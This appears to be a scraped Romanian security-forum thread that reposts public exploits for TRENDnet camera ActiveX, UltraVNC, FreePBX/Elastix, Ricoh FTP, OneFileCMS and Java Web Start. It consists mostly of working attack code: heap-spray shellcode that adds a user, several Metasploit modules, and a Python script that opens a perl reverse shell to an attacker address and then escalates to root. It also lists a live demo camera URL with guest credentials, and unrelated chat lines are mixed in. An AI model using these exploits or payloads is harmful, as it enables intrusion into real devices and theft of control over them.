block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<1000;i++){memory[i] = block+shellcode}
</script>
<script defer=defer>
obj.Add(0x76767676,1); //this should result in an address beginning with 0x1d1d[..]
</script> -
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow
camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest
Background:
The mentioned product, when browsing the device web interface,
asks to install an ActiveX control to stream video content.
It has the following settings:
File version: 1, 1, 52, 18
Product name: UltraMJCam device ActiveX Control
Binary path: C:\WINDOWS\Downloaded Program Files\UltraMJCamX.ocx
ProgID: UltraMJCam.UltraMJCam.1
CLSID: {707ABFC2-1D27-4a10-A6E4-6BE6BDF9FB11}
Implements IObjectSafety: yes
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True
Vulnerability:
This ActiveX control exposed the vulnerable
OpenFileDlg() method, see typelib:
...
/* DISPID=101 */
/* VT_BSTR [8] */
function OpenFileDlg(
/* VT_BSTR [8] [in] */ $sFilter
)
{
/* method OpenFileDlg */
}
...
By invoking this method with an overlong argument is possible
to overflow a buffer. This is because of an insecure
WideCharToMultiByte() call inside UltraMJCamX.ocx:
Call stack of main thread
Address Stack Procedure / arguments Called from Frame
001279FC 77E6F20B kernel32.77E637DE kernel32.77E6F206 00127A0C
00127A10 0299F958 kernel32.WideCharToMultiByte UltraMJC.0299F952 00127A0C
00127A14 00000003 CodePage = 3
00127A18 00000000 Options = 0
00127A1C 03835C5C WideCharStr = "&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
00127A20 FFFFFFFF WideCharCount = FFFFFFFF (-1.)
00127A24 00127A50 MultiByteStr = 00127A50
00127A28 00007532 MultiByteCount = 7532 (30002.)
00127A2C 00000000 pDefaultChar = NULL
00127A30 00000000 pDefaultCharUsed = NULL
00127A3C 029B11D0 UltraMJC.0299F920 UltraMJC.029B11CB 00127A38
...
0299F934 8B45 08 mov eax,dword ptr ss:[ebp+8]
0299F937 C600 00 mov byte ptr ds:[eax],0
0299F93A 6A 00 push 0
0299F93C 6A 00 push 0
0299F93E 8B4D 10 mov ecx,dword ptr ss:[ebp+10]
0299F941 51 push ecx
0299F942 8B55 08 mov edx,dword ptr ss:[ebp+8]
0299F945 52 push edx
0299F946 6A FF push -1
0299F948 8B45 0C mov eax,dword ptr ss:[ebp+C]
0299F94B 50 push eax
0299F94C 6A 00 push 0
0299F94E 8B4D 14 mov ecx,dword ptr ss:[ebp+14]
0299F951 51 push ecx
0299F952 FF15 20319F02 call dword ptr ds:[<&KERNEL32.WideCharTo>; kernel32.WideCharToMultiByte <------------
...
The result is that critical structures are overwritten (SEH)
allowing to execute arbitrary code against the target browser.
As attachment, basic proof of concept code.
<!--
TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX
Control OpenFileDlg() WideCharToMultiByte Remote Buffer Overflow poc
IE7-nodep
camera demo
http://67.203.184.58:9193/admin/view.cgi?profile=0
username=guest
password=guest
rgod
-->
<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:707ABFC2-1D27-4A10-A6E4-6BE6BDF9FB11' id='obj' />
</object>
<script language='javascript'>
//add user one, user "sun" pass "tzu"
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" +
"%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
"%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
"%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
"%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
"%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
"%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
"%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
"%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
"%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
"%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
"%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
"%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
"%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
"%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
"%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
"%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
"%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
"%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
"%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
"%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
"%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
"%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
"%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
"%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
"%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
"%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
"%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
"%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
"%u7734%u4734%u4570");
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<1888;i++){memory[i] = block+shellcode}
</script>
<script defer=defer>
var x ="";
for (i=0; i<15000; i++){
x = x + "&";
}
obj.OpenFileDlg(x);
</script> -
Astia vand tot? o vine si pe masa daca are clienti
-
-
Degeaba dai bani pe ele, incearca de maine sa nu mai fumezi deloc vezi cat rezisti.
-
UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in UltraVNC Viewer 1.0.2 Release.
If a malicious server responds to a client connection indicating a minor
protocol version of 14 or 16, a 32-bit integer is subsequently read from
the TCP stream by the client and directly provided as the trusted size for
further reading from the TCP stream into a 1024-byte character array on
the stack.
},
'Author' => 'noperand',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-0610' ],
[ 'OSVDB', '42840' ],
[ 'BID', '27561' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3', { 'Ret' => 0x00421a61 } ], # vncviewer.exe, 1.0.2
],
'Privileged' => false,
'DisclosureDate' => 'Feb 6 2008',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
], self.class)
end
def on_client_connect(client)
return if ((p = regenerate_payload(client)) == nil)
sploit = rand_text_alpha(1100) # junk, could be more efficient here
sploit << "\x00\x04\x00\x00" # value to get around a write
sploit << rand_text_alpha(12) # random junk
sploit << "\xEB\x06" << make_nops(2) # short relative jump
sploit << [target.ret].pack('V') # pop/pop/ret (default is in vncviewer.exe)
sploit << payload.encoded
=begin
We prepend the initial 12 bytes including the servers' desired protocol version ("RFB 003.016").
- These bytes are read directly by a call to ReadExact() with a size of 12.
...
if (m_minorVersion == 14 || m_minorVersion == 16)
{
int size;
ReadExact((char *)&size,sizeof(int));
char mytext[1024]; //10k
ReadExact(mytext,size);
mytext[size]=0;
...
If minor version is 16 or 14, a 32-bit integer follows indicating the size of our data to read.
We then append our data.
=end
sploit = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x31\x36\x0a" << [sploit.length].pack('N') << sploit
print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
client.put(sploit)
handler(client)
service.close_client(client)
end
endSursa: UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
-
FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution',
'Description' => %q{
This module exploits FreePBX version 2.10.0,2.9.0 and possibly older.
Due to the way callme_page.php handles the 'callmenum' parameter, it
is possible to inject code to the '$channel' variable in function
callme_startcall in order to gain remote code execution.
Please note in order to use this module properly, you must know the
extension number, which can be enumerated or bruteforced, or you may
try some of the default extensions such as 0 or 200. Also, the call
has to be answered (or go to voice).
Tested on both Elastix and FreePBX ISO image installs.
},
'Author' => [ 'muts','Martin Tschirsich' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.exploit-db.com/exploits/18649/' ]
],
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
},
'Targets' =>
[
[ 'Automatic Target', { }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 20 2012'))
register_options(
[
OptString.new("EXTENSION", [ true, "A range of Local extension numbers", "0-100" ]),
], self.class)
end
def exploit
# Check range input
if datastore['EXTENSION'] =~ /^(\d+)\-(\d+)$/
min = $1.to_i
max = $2.to_i
else
print_error("Please specify a range for option 'EXTENSION'")
return
end
cmd = Rex::Text.uri_encode(payload.encoded)
(min..max).each do |e|
connect
print_status("#{rhost}:#{rport} - Sending evil request with range #{e.to_s}")
res = send_request_raw({
'method' => 'GET',
'uri' => "/recordings/misc/callme_page.php?action=c&callmenum="+e.to_s+"@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20#{cmd}%0D%0A%0D%0A",
'version' => '1.0',
'vhost' => rhost
})
handler
disconnect
end
end
endSursa: FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution
-
Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow"
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
def initialize(info={})
super(update_info(info,
'Name' => "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
'Description' => %q{
This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP
service. By supplying a long string of data to the USER command, it is
possible to trigger a stack-based buffer overflow, which allows remote code
execution under the context of the user.
Please note that in order to trigger the vulnerability, the server must
be configured with a log file name (by default, it's disabled).
},
'License' => MSF_LICENSE,
'Author' =>
[
'Julien Ahrens', #Discovery, PoC
'sinn3r' #Metasploit
],
'References' =>
[
['OSVDB', '79691'],
['URL', 'http://secunia.com/advisories/47912'],
['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']
],
'Payload' =>
{
# Yup, no badchars
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3',
{
'Ret' => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll)
'Offset' => 245
}
]
],
'Privileged' => false,
'DisclosureDate' => "Mar 1 2012",
'DefaultTarget' => 0))
# We're triggering the bug via the USER command, no point to have user/pass
# as configurable options.
deregister_options('FTPPASS', 'FTPUSER')
end
def check
connect
disconnect
if banner =~ /220 DSC ftpd 1\.0 FTP Server/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
buf = ''
buf << rand_text_alpha(target['Offset'], payload_badchars)
buf << [target.ret].pack('V')
buf << make_nops(20)
buf << payload.encoded
print_status("#{rhost}:#{rport} - Sending #{self.name}")
connect
send_user(buf)
handler
disconnect
end
end
=begin
0:002> lmv m SR10
start end module name
00400000 00410000 SR10 (deferred)
Image path: C:\Program Files\DC Software\SR10.exe
Image name: SR10.exe
Timestamp: Mon May 19 23:55:32 2008 (483275E4)
CheckSum: 00000000
ImageSize: 00010000
File version: 1.0.0.520
Product version: 1.0.0.0
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Ricoh Co.,Ltd.
ProductName: SR-10
InternalName: SR-10
OriginalFilename: SR10.EXE
ProductVersion: 1, 0, 0, 0
FileVersion: 1, 0, 0, 520
PrivateBuild: 1, 0, 0, 520
SpecialBuild: 1, 0, 0, 520
FileDescription: SR-10
Note: No other DC Software dlls are loaded when SR-10.exe is running, so the most
stable component we can use is msvcrt.dll for now.
=endSursa: Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow"
-
FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit
#!/usr/bin/python
############################################################
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
# Google Dork: oy vey
# Date: March 23rd, 2010
# Author: muts
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
# Tested on: multiple
# CVE : notyet
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
############################################################
# Discovered by Martin Tschirsich
# http://seclists.org/fulldisclosure/2012/Mar/234
# http://www.exploit-db.com/exploits/18649
############################################################
import urllib
rhost="172.16.254.72"
lhost="172.16.254.223"
lport=443
extension="1000"
# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)
# On Elastix, once we have a shell, we can escalate to root:
# root@bt:~# nc -lvp 443
# listening on [any] 443 ...
# connect to [172.16.254.223] from voip [172.16.254.72] 43415
# id
# uid=100(asterisk) gid=101(asterisk)
# sudo nmap --interactive
# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)Sursa: FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit
-
OneFileCMS - Failure to Restrict URL Access
# Exploit Title: OneFileCMS - Failure to Restrict URL Access
# Date: 12th March 2012
# Author: Abhi M Balakrishnan
# Software Link: https://raw.github.com/rocktronica/OneFileCMS/f265961d0646890c9efe05b93983124abc18c56e/onefilecms.php
# Version: upto 1.1.4
# Tested on: Apache-2.2.17, PHP-5.2.17, MySQL-5.5.9, Windows 6.2
# Vulnerability Status: Fixed on version 1.1.5. Developer was very quick in responding to mails and to fix the issue. Bugfix version released within minutes after the notification. Great work.!!!
Commit: https://github.com/rocktronica/OneFileCMS/commit/a4e36213d9fe3efccc2f6730d29fd2a05c57594b
# Vulnerability: Failure to Restrict URL Access, since the redirection mechanism can be bypassed easily
# Exploit:
Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/
Step 2: Access http://example.com/path/admin.php
# PoC Video: http://www.youtube.com/watch?v=0lPz24Z7Q_4 -
-
Sun Java Web Start Plugin Command Line Argument Injection (2012)
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
#
# This module acts as an HTTP server
#
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Sun Java Web Start Plugin Command Line Argument Injection (2012)',
'Description' => %q{
This module exploits a flaw in the Web Start component of the Sun Java
Runtime Environment. The arguments passed to Java Web Start are not properly
validated, allowing injection of arbitrary arguments to the JVM.
By utilizing the lesser known -J option, an attacker can take advantage of
the -XXaltjvm option, as discussed previously by Ruben Santamarta. This method
allows an attacker to execute arbitrary code in the context of an unsuspecting
browser user.
In order for this module to work, it must be ran as root on a server that
does not serve SMB. Additionally, the target host must have the WebClient
service (WebDAV Mini-Redirector) enabled.
},
'License' => MSF_LICENSE,
'Author' => 'jduck', # Bug reported to Oracle by TELUS
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2012-0500' ],
[ 'OSVDB', '79227' ],
[ 'BID', '52015' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2012/Feb/251' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html' ]
],
'Platform' => 'win',
'Payload' =>
{
'Space' => 1024,
'BadChars' => '',
'DisableNops' => true,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
},
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Java Runtime on Windows x86',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 14 2012'
))
register_options(
[
OptPort.new('SRVPORT', [ true, "The daemon port to listen on", 80 ]),
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
OptString.new('UNCPATH', [ false, 'Override the UNC path to use. (Use with an SMB server)' ])
], self.class)
end
def auto_target(cli, request)
agent = request.headers['User-Agent']
ret = nil
#print_status("Agent: #{agent}")
# Check for MSIE and/or WebDAV redirector requests
if agent =~ /(Windows NT (5|6)\.(0|1|2)|MiniRedir\/(5|6)\.(0|1|2))/
ret = targets[1]
elsif agent =~ /MSIE (6|7|8)\.0/
ret = targets[1]
else
print_status("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
end
ret
end
def on_request_uri(cli, request)
# For this exploit, this does little besides ensures the user agent is a recognized one..
mytarget = target
if target.name == 'Automatic'
mytarget = auto_target(cli, request)
if (not mytarget)
send_not_found(cli)
return
end
end
# Special case to process OPTIONS for /
if (request.method == 'OPTIONS' and request.uri == '/')
process_options(cli, request, mytarget)
return
end
# Discard requests for ico files
if (request.uri =~ /\.ico$/i)
send_not_found(cli)
return
end
# If there is no subdirectory in the request, we need to redirect.
if (request.uri == '/') or not (request.uri =~ /\/([^\/]+)\//)
if (request.uri == '/')
subdir = '/' + rand_text_alphanumeric(8+rand(8)) + '/'
else
subdir = request.uri + '/'
end
print_status("Request for \"#{request.uri}\" does not contain a sub-directory, redirecting to #{subdir} ...")
send_redirect(cli, subdir)
return
else
share_name = $1
end
# dispatch WebDAV requests based on method first
case request.method
when 'OPTIONS'
process_options(cli, request, mytarget)
when 'PROPFIND'
process_propfind(cli, request, mytarget)
when 'GET'
process_get(cli, request, mytarget, share_name)
when 'PUT'
print_status("Sending 404 for PUT #{request.uri} ...")
send_not_found(cli)
else
print_error("Unexpected request method encountered: #{request.method}")
end
end
#
# GET requests
#
def process_get(cli, request, target, share_name)
print_status("Responding to \"GET #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")
# dispatch based on extension
if (request.uri =~ /\.dll$/i)
#
# DLL requests sent by IE and the WebDav Mini-Redirector
#
print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...")
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Generate a DLL based on the payload
dll_data = generate_payload_dll({ :code => p.encoded })
# Send it
send_response(cli, dll_data, { 'Content-Type' => 'application/octet-stream' })
elsif (request.uri =~ /\.jnlp$/i)
#
# Send the jnlp document
#
# Prepare the UNC path...
if (datastore['UNCPATH'])
unc = datastore['UNCPATH'].dup
else
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
unc = "\\\\" + my_host + "\\" + share_name
end
# NOTE: we ensure there's only a single backslash here since it will get escaped
if unc[0,2] == "\\\\"
unc.slice!(0, 1)
end
http_agent = Rex::Text.rand_text_alpha(8+rand(8))
jnlp_data = <<-EOS
<?xml version="1.0" encoding="UTF-8"?>
<jnlp version="1">
<information>
<title>#{Rex::Text.rand_text_alpha(rand(10)+10)}</title>
<vendor>#{Rex::Text.rand_text_alpha(rand(10)+10)}</vendor>
<description>#{Rex::Text.rand_text_alpha(rand(10)+10)}</description>
</information>
<resources>
<java version="1.3+" initial-heap-size='512m" -J-XXaltjvm=#{unc} "' />
</resources>
<resources><java java-vm-args='-Dhttp.agent=#{http_agent}"' /></resources>
</jnlp>
EOS
print_status("Sending JNLP to #{cli.peerhost}:#{cli.peerport}...")
send_response(cli, jnlp_data, { 'Content-Type' => 'application/x-java-jnlp-file' })
else
print_status("Sending redirect to the JNLP file to #{cli.peerhost}:#{cli.peerport}")
jnlp_name = Rex::Text.rand_text_alpha(8 + rand(8))
jnlp_path = get_resource()
if jnlp_path[-1,1] != '/'
jnlp_path << '/'
end
jnlp_path << request.uri.split('/')[-1] << '/'
jnlp_path << jnlp_name << ".jnlp"
send_redirect(cli, jnlp_path, '')
end
end
#
# OPTIONS requests sent by the WebDav Mini-Redirector
#
def process_options(cli, request, target)
print_status("Responding to WebDAV \"OPTIONS #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")
headers = {
#'DASL' => '<DAV:sql>',
#'DAV' => '1, 2',
'Allow' => 'OPTIONS, GET, PROPFIND',
'Public' => 'OPTIONS, GET, PROPFIND'
}
send_response(cli, '', headers)
end
#
# PROPFIND requests sent by the WebDav Mini-Redirector
#
def process_propfind(cli, request, target)
path = request.uri
print_status("Received WebDAV \"PROPFIND #{request.uri}\" request from #{cli.peerhost}:#{cli.peerport}")
body = ''
if (path =~ /\.dll$/i)
# Response for the DLL
print_status("Sending DLL multistatus for #{path} ...")
#<lp1:getcontentlength>45056</lp1:getcontentlength>
body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0132-b000-43c6e5f8d2f80"</lp1:getetag>
<lp2:executable>F</lp2:executable>
<D:lockdiscovery/>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
elsif (path =~ /\/$/) or (not path.sub('/', '').index('/'))
# Response for anything else (generally just /)
print_status("Sending directory multistatus for #{path} ...")
body = %Q|<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}</D:href>
<D:propstat>
<D:prop>
<lp1:resourcetype><D:collection/></lp1:resourcetype>
<lp1:creationdate>2010-02-26T17:07:12Z</lp1:creationdate>
<lp1:getlastmodified>Fri, 26 Feb 2010 17:07:12 GMT</lp1:getlastmodified>
<lp1:getetag>"39e0001-1000-4808c3ec95000"</lp1:getetag>
<D:lockdiscovery/>
<D:getcontenttype>httpd/unix-directory</D:getcontenttype>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
|
else
print_status("Sending 404 for #{path} ...")
send_not_found(cli)
return
end
# send the response
resp = create_response(207, "Multi-Status")
resp.body = body
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
end
#
# Make sure we're on the right port/path to support WebDAV
#
def exploit
if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
end
super
end
endSursa: Sun Java Web Start Plugin Command Line Argument Injection (2012)
joomla component (com_ponygallery) SQL injection Vulnerability
in Exploituri
Posted
joomla component (com_ponygallery) SQL injection Vulnerability
Sursa: joomla component (com_ponygallery) SQL injection Vulnerability